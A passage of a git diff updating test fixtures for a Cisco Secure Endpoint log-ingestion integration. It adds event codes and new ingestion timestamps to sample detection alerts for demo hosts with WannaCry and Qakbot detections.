                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204905956803000",
@@ -3951,8 +3999,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513748750Z",
+                "ingested": "2021-09-30T00:15:28.103825578Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204905956803000",
@@ -4040,8 +4089,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513750477Z",
+                "ingested": "2021-09-30T00:15:28.103828588Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204905956803000",
@@ -4113,8 +4163,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513752305Z",
+                "ingested": "2021-09-30T00:15:28.103830803Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419204905956803000",
@@ -4184,8 +4235,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513754046Z",
+                "ingested": "2021-09-30T00:15:28.103832883Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204901661835000",
@@ -4259,8 +4311,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513755889Z",
+                "ingested": "2021-09-30T00:15:28.103834989Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204901661835000",
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
similarity index 97%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
index 419ad65737f..67f760bb316 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json
@@ -28,8 +28,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818478679Z",
+                "ingested": "2021-09-30T00:15:43.965480188Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204901661835000",
@@ -115,8 +116,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818482942Z",
+                "ingested": "2021-09-30T00:15:43.965485160Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204901661835000",
@@ -200,8 +202,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818484826Z",
+                "ingested": "2021-09-30T00:15:43.965487365Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204901661835000",
@@ -289,8 +292,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818486612Z",
+                "ingested": "2021-09-30T00:15:43.965489493Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204901661835000",
@@ -378,8 +382,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818488381Z",
+                "ingested": "2021-09-30T00:15:43.965491566Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204901661835000",
@@ -451,8 +456,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818490142Z",
+                "ingested": "2021-09-30T00:15:43.965493606Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419204901661835000",
@@ -522,8 +528,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818491873Z",
+                "ingested": "2021-09-30T00:15:43.965495672Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6411462922463085000",
@@ -597,8 +604,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818493608Z",
+                "ingested": "2021-09-30T00:15:43.965497735Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6411462922463085000",
@@ -684,8 +692,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818495354Z",
+                "ingested": "2021-09-30T00:15:43.965499836Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6411462918168117000",
@@ -763,8 +772,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818497077Z",
+                "ingested": "2021-09-30T00:15:43.965501904Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective 